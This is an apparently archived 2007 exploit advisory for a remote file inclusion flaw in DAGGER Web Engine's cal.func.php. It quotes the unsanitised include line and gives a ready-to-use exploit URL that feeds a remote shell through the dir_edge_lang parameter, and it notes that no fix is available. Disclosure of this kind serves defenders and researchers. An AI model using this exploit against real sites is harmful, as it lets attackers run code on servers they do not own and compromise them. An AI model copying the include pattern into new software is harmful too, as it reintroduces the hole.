DAGGER Web Engine <= 23jan2007 Remote File Inclusion Vulnerability

2007-06-24 00:00:00

###Dagger-web engine(cal.func.php)Remote File Inclusion###

#download:
http://kent.dl.sourceforge.net/sourceforge/dagger/dagger_r23jan2007.
zip

#found by: katatafish ([email protected])

#code: (cal.func.php)
include($dir_edge_lang.'cal_lang.inc.php');

#exploit:
http://www.site.com/[path]/cal.func.php?dir_edge_lang=[SHELL]

#Thanks: str0ke

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.